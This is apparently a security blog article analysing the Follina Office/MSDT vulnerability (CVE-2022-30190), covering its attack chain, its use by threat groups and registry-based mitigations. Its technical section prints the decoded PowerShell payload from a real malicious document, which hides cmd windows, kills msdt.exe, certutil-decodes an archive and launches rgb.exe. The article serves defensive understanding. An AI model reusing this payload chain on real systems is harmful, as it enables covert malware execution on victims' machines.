Introduction

Follina is a vulnerability that grabbed the attention on May 27, 2022, when a tweet of nao_sec got popular over Twitter revealing the scanning results of a malicious doc on virus total. It is an exploit for Arbitrary code execution (ACE). After getting conscious of this vulnerability Microsoft released the patch for all Microsoft suites. The National Institute of Standards (NIST) has assigned the Common Vulnerability Exposure (CVE) number CVE-2022-30190.

What is Arbitrary Code Execution (ACE)?

Arbitrary Code Execution means a case that is caused by software or hardware error and then an attacker can exploit that and can take advantage which will result in remote code execution.

How Follina works?

A rarely used Windows component is the target of this attack in Follina. In this, a component of windows named “Microsoft Support Diagnostic Tool” (MSDT) is being used which uses specially crafted Word or RTF files to set off MSDT to download and execute any malicious PowerShell code. 

Overview: -

1.     Trojanized Microsoft file is sent to the victim using various methods like social engineering, phishing, etc.

2.     The victim opens the Malicious file.

3.     Microsoft Office fetches the malicious HTML resources via links embedded in the file (Discuss in deep later).

4.     Java Script within the HTML invokes MSDT.EXE (Microsoft Support Diagnostic Tool) to execute malicious PowerShell code.

5.     PowerShell deploys second-stage malware

Deep Dive into the Technical Concept: -

• The doc which is being obtained by nao_sec by unzipping that we got the following result

• Here we can see the word/_rels/ directory document.xml.rels contains an external referencing link to the following address

• Here we can see that there is an HTML ad RDF842l.html but it is not online anymore.
• The RDF842l.html file contained a script tag whose code is as follows

• By looking at the script it shows the schema as ms-msdt and here PCWDiagnostic is invoked with the parameter IT_BrowseForFile, which includes PowerShell syntax.
• At the bottom, it seems some kind of encoded data. So, after analysis, it came out to be a base64 encoding. By decoding it we got the following output

Output: -

$cmd = "c:\windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

• The usage of rgb.exe is unknown but hypothetically it is the kind of technology that gives the threat actor code execution privileges with just one click.

Wild Consequences faced because of this Vulnerability

When Follina came into the spotlight then the security researchers also reveals that this vulnerability was already being used to exploit various governments. But the first attack that had taken place was in mid-April which made sextortion threats and the invitation to sputnik radio interviews as bait. They also revealed that the “Chinese TA413 Hacking group” exploited this vulnerability targeting Tibetan migrates. Other threat groups also used this vulnerability to target US and EU government agencies.

What is the impact of Follina vulnerability?

As we had already studied that Follina is Arbitrary code execution (ACE) based vulnerability so we know that it is a severe vulnerability. It has a base score of 7.8. As this vulnerability can download and execute any kind of code so that the malicious actor can get a reverse shell to execute commands. 

Mitigation for Follina 

Microsoft released a patch for this vulnerability in June. To avoid this vulnerability the first thing one should do is disable Microsoft Support Diagnostic Tool (MSDT) URL protocol. Secondly, disable the preview pane of explorer too because it can be another attack vector to preview malicious documents.

1.     Disabling MSDT

• Rum command prompt as Administrator
• Back up the registry and execute the following commands one by one.

                             i.           “reg export HKEY_CLASSES_ROOT\ms-msdt filename”

                             ii.           “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

• If you want to reverse this and enable msdt then use the following command

                                   i.           “reg import filename”

You can use multiple defenders and tools to protect yourself from Follina vulnerability

1.     Microsoft Defender Office

This is a tool for office 365 that can detect Follina vulnerabilities. If they are attached to emails or any URLs it can detect the threat using the signatures of that certain document.

2.     Microsoft Defender Antivirus

It is an inbuilt antivirus in the windows operating system. In the latest version of Microsoft defender Antivirus, it can detect Follina with certain signatures which have been mentioned by the Microsoft researcher’s team.

Summary

Follina is an ACE type vulnerability in which using a malicious document file whose embedded HTML will contain a JavaScript code that will invoke MSDT to execute malicious PowerShell code through which we can execute any malicious code, Remote Access Trojan (RAT), or can get a reverse shell. 

FAQs

1.     Is Follina patched?

Ans. Microsoft has given the state that a patch for Follina vulnerability is released for all Microsoft products.

2.     What is the severity of Follina?

Ans. The severity has been assigned as High with a base score of 7.8

3.     Follina is based on Remote Code Execution (RCE) or Arbitrary Code Execution (ACE)?

Ans. RCE is a type of ACE exploit that has been given to Follina